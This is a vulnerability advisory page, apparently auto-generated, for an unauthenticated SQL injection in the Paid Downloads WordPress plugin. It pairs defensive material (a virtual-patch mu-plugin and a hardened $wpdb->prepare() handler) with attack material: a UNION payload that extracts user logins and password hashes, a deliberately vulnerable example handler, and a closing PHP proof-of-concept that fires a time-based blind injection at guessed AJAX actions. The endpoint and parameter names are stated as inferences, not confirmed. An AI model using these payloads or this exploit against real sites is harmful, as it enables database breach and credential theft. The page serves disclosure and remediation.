Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 18, 2026

CVE-2025-68857: Paid Downloads <= 3.15 – Unauthenticated SQL Injection (paid-downloads)

Severity High (CVSS 7.5)
CWE 89
Vulnerable Version 3.15
Patched Version
Disclosed January 20, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-68857 (metadata-based):
The Paid Downloads WordPress plugin, version 3.15 and earlier, contains an unauthenticated SQL injection vulnerability. This flaw allows remote attackers to execute arbitrary SQL commands against the WordPress database. The vulnerability stems from insufficient input sanitization in a plugin endpoint, enabling data extraction without authentication.

Atomic Edge research infers the root cause is improper neutralization of user-supplied parameters within an SQL query, consistent with CWE-89. The description cites insufficient escaping and lack of query preparation. This indicates the plugin likely constructs SQL statements by directly concatenating user input into query strings without using prepared statements via `$wpdb->prepare()`. The vulnerable code path is likely an AJAX handler or a public-facing shortcode handler that processes user input for database operations.

The exploitation vector is an unauthenticated HTTP request to a plugin endpoint. Based on WordPress plugin patterns, the likely target is the `/wp-admin/admin-ajax.php` script with an `action` parameter corresponding to a plugin hook, such as `paid_downloads_action`. An attacker would send a POST or GET request containing a malicious SQL payload in a vulnerable parameter. A typical payload would use UNION-based injection to extract data from the `wp_users` table, such as `' UNION SELECT user_login,user_pass FROM wp_users--`. The attack requires no authentication or nonce.
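Because no patched version is listed, a site operator may want a request-layer stop-gap that rejects malformed input before the plugin's handler runs. The following must-use plugin is an added illustration written for this page, not code from Atomic Edge or from the Paid Downloads plugin. It relies on the same inferences the analysis makes: that the endpoint is reached through admin-ajax.php with an `action` beginning with `paid_downloads`, and that the injected parameter is `id`, which should only ever carry a positive integer. Both names are assumptions and should be adjusted to the real handler once it is identified.

```php
<?php
/**
 * Plugin Name: Paid Downloads virtual patch (added example, not part of the plugin)
 * Description: Drop into wp-content/mu-plugins/ as a temporary mitigation.
 *
 * Assumptions (inferred, not confirmed by the advisory):
 *   - the vulnerable handler is dispatched by admin-ajax.php with an 'action'
 *     value that starts with 'paid_downloads';
 *   - the injected parameter is named 'id' and is meant to be a positive integer.
 */

/**
 * Decide whether a request to this plugin's AJAX endpoint carries an 'id'
 * that cannot be a legitimate integer identifier.
 *
 * @param array $request Merged GET/POST parameters (normally $_REQUEST).
 * @return bool True when the request should be rejected.
 */
function pd_vp_request_is_suspicious( array $request ) {
	$action = isset( $request['action'] ) && is_string( $request['action'] ) ? $request['action'] : '';
	if ( 0 !== strpos( $action, 'paid_downloads' ) ) {
		return false; // Not this plugin's endpoint; leave other requests alone.
	}
	if ( ! array_key_exists( 'id', $request ) ) {
		return false; // Nothing to validate.
	}
	if ( ! is_string( $request['id'] ) ) {
		return true; // Arrays or other non-scalar values are never a valid id.
	}
	// A numeric identifier must be digits only. Quotes, spaces, comment
	// sequences and keywords all fail this test, so the SQL-building code
	// downstream never sees them.
	return 1 !== preg_match( '/^[0-9]+$/', $request['id'] );
}

/**
 * Reject suspicious AJAX requests with a 400 before any plugin handler runs.
 */
function pd_vp_guard() {
	if ( ! wp_doing_ajax() ) {
		return;
	}
	if ( pd_vp_request_is_suspicious( $_REQUEST ) ) {
		$remote = isset( $_SERVER['REMOTE_ADDR'] ) ? $_SERVER['REMOTE_ADDR'] : 'unknown';
		// Log for the SOC; sanitize_key() keeps attacker-controlled text out of the log line.
		error_log( sprintf(
			'[pd-virtual-patch] rejected action=%s from %s',
			sanitize_key( $_REQUEST['action'] ),
			$remote
		) );
		wp_send_json_error( array( 'message' => 'invalid request' ), 400 ); // calls wp_die()
	}
}

// admin-ajax.php fires 'admin_init' before dispatching the wp_ajax_* and
// wp_ajax_nopriv_* hooks, and mu-plugins load before regular plugins, so
// priority 0 here runs ahead of the vulnerable handler.
add_action( 'admin_init', 'pd_vp_guard', 0 );
```

The guard is deliberately narrow: it only touches requests whose `action` matches the assumed prefix, so it cannot break unrelated AJAX traffic, and it validates by allow-list (digits only) rather than trying to recognise injection syntax. If the real vulnerable parameter turns out to be a string field such as a file name, replace the digit check with the appropriate allow-list for that field instead of loosening it.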

Remediation requires implementing proper input validation and using prepared statements. The fix should replace direct string concatenation in SQL queries with the WordPress `$wpdb->prepare()` method. All user-supplied parameters must be properly escaped or cast to expected types. The plugin should also implement capability checks for any administrative actions and nonce verification for state-changing operations, though these would not directly prevent the SQL injection described.
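To make the remediation concrete, here is a hypothetical AJAX handler written for this page (an added example, not the Paid Downloads plugin's real code) showing the concatenation pattern the analysis infers, followed by the hardened form using `$wpdb->prepare()`, type casting and a nonce check. The hook name `paid_downloads_get_file`, the parameter `id` and the table `{$wpdb->prefix}paid_downloads` are assumptions chosen to match the analysis above.

```php
<?php
// Added illustration (not the plugin's own code). Assumed names: AJAX action
// 'paid_downloads_get_file', request parameter 'id', table {$wpdb->prefix}paid_downloads.

// --- Vulnerable pattern (CWE-89): request data interpolated into the SQL text ---
function pd_example_get_file_vulnerable() {
	global $wpdb;
	$id = isset( $_REQUEST['id'] ) ? $_REQUEST['id'] : '';
	// The value is placed inside the string literal unescaped, so a single
	// quote in the input terminates the literal and the remainder is parsed as SQL.
	$row = $wpdb->get_row( "SELECT file_path FROM {$wpdb->prefix}paid_downloads WHERE id = '$id'" );
	wp_send_json_success( array( 'file' => $row ? $row->file_path : null ) );
}

// --- Hardened pattern ---
function pd_example_get_file_fixed() {
	global $wpdb;

	// Nonce check for the state-changing/authenticated variant. The page notes this
	// does not by itself stop injection; it narrows who can reach the query at all.
	if ( is_user_logged_in() ) {
		check_ajax_referer( 'paid_downloads_get_file', 'nonce' );
	}

	// 1. Type enforcement: an identifier is a positive integer or it is rejected.
	$id = isset( $_REQUEST['id'] ) ? absint( $_REQUEST['id'] ) : 0;
	if ( 0 === $id ) {
		wp_send_json_error( array( 'message' => 'invalid id' ), 400 ); // wp_die()s
	}

	// 2. Parameterised query: %d binds the value as an integer, so nothing from the
	//    request ever becomes part of the SQL text. Use %s for string columns.
	//    Identifiers (table names) cannot be bound, hence the fixed $wpdb->prefix.
	$sql = $wpdb->prepare(
		"SELECT file_path FROM {$wpdb->prefix}paid_downloads WHERE id = %d",
		$id
	);
	$row = $wpdb->get_row( $sql );

	if ( null === $row ) {
		wp_send_json_error( array( 'message' => 'not found' ), 404 );
	}
	wp_send_json_success( array( 'file' => $row->file_path ) );
}

// Register only the hardened handler for both unauthenticated and authenticated callers.
add_action( 'wp_ajax_nopriv_paid_downloads_get_file', 'pd_example_get_file_fixed' );
add_action( 'wp_ajax_paid_downloads_get_file', 'pd_example_get_file_fixed' );
```

The two changes that actually close the injection are the `absint()` cast and the `%d` placeholder in `$wpdb->prepare()`; with both in place the query the database receives is identical for every possible input except the numeric value. Where the column is textual, keep the `%s` placeholder and still validate the value against what the field is allowed to contain rather than relying on escaping alone.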

Successful exploitation leads to full compromise of database confidentiality. Attackers can extract sensitive information including user credentials (hashed passwords), personal data, payment records, and download transaction logs. This data breach can facilitate further attacks like password cracking or privilege escalation. The CVSS vector indicates high confidentiality impact (C:H) with no integrity or availability impact, aligning with an information disclosure vulnerability.

Differential between vulnerable and patched code

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2025-68857 - Paid Downloads <= 3.15 - Unauthenticated SQL Injection
/**
 * Proof of Concept for CVE-2025-68857.
 * This script demonstrates unauthenticated SQL injection in the Paid Downloads plugin.
 * The exact vulnerable endpoint and parameter are inferred from WordPress plugin patterns.
 * Assumptions:
 * 1. The vulnerability exists in an AJAX handler accessible via admin-ajax.php.
 * 2. The 'action' parameter hook contains 'paid_downloads'.
 * 3. A user-controlled parameter is concatenated into an SQL query.
 */

$target_url = 'http://vulnerable-site.com/wp-admin/admin-ajax.php'; // CHANGE THIS

// Common AJAX action names for the Paid Downloads plugin
$possible_actions = [
    'paid_downloads_get_file',
    'paid_downloads_process',
    'paid_downloads_action',
    'paid_downloads_ajax_handler'
];

// SQL injection payload to extract database version (proof-of-concept)
// Using time-based blind injection to avoid excessive data output in initial testing
$sql_payload = "' OR IF(SUBSTRING(@@version,1,1)='5',SLEEP(5),0)--";

$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);

foreach ($possible_actions as $action) {
    $post_data = [
        'action' => $action,
        'id' => $sql_payload, // Assuming 'id' is a vulnerable parameter
        'nonce' => '' // Vulnerability may not require a nonce
    ];

    curl_setopt($ch, CURLOPT_URL, $target_url);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);

    $start_time = microtime(true);
    $response = curl_exec($ch);
    $end_time = microtime(true);

    $response_time = $end_time - $start_time;

    if ($response_time > 4.9) {
        echo "[+] Potential SQL Injection found via action: $action\n";
        echo "    Response delayed by {$response_time} seconds\n";
        echo "    Confirm with: ' UNION SELECT user_login,user_pass FROM wp_users--\n";
        break;
    } else {
        echo "[-] No injection via action: $action (response time: {$response_time}s)\n";
    }
}

curl_close($ch);
?>
